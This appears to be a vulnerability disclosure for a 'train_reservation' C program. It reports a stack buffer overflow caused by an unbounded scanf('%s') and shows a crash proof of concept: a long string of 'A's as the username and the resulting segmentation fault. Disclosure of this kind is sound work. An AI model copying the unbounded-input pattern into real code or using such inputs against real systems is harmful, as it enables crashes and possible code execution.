- Train Ticket Reservation System: [Version 1.0, binary compiled as
./train_reservation]
- Vulnerability Type: Buffer Overflow (Stack-Based)
- Severity: HIGH
- Status: Unpatched
The vulnerability lies in the following line of code:
scanf("%s", &uname);Using scanf with %s without specifying an input size limit results in a Buffer Overflow. This flaw occurs because there is no control over the size of the user input, allowing an attacker to write beyond the allocated memory buffer, corrupting the stack and causing a segmentation fault.
- Compile the program with the name
./train_reservation. - Execute the program and provide an overly long input to trigger the buffer overflow.
./train_reservationAt the prompt, enter the following text as the username:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The program crashes with a segmentation fault due to stack overflow:
======================= LOGIN FORM =======================
ENTER USERNAME:-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1] 705453 segmentation fault (core dumped) ./train_reservation
- Program Crash: The system can be disrupted by malicious users supplying malformed input, leading to execution failures.
- Arbitrary Code Execution: In advanced cases, the buffer overflow may allow arbitrary code execution, compromising the system.
- Privilege Escalation: If the program is run with elevated privileges, the attack could compromise the entire machine.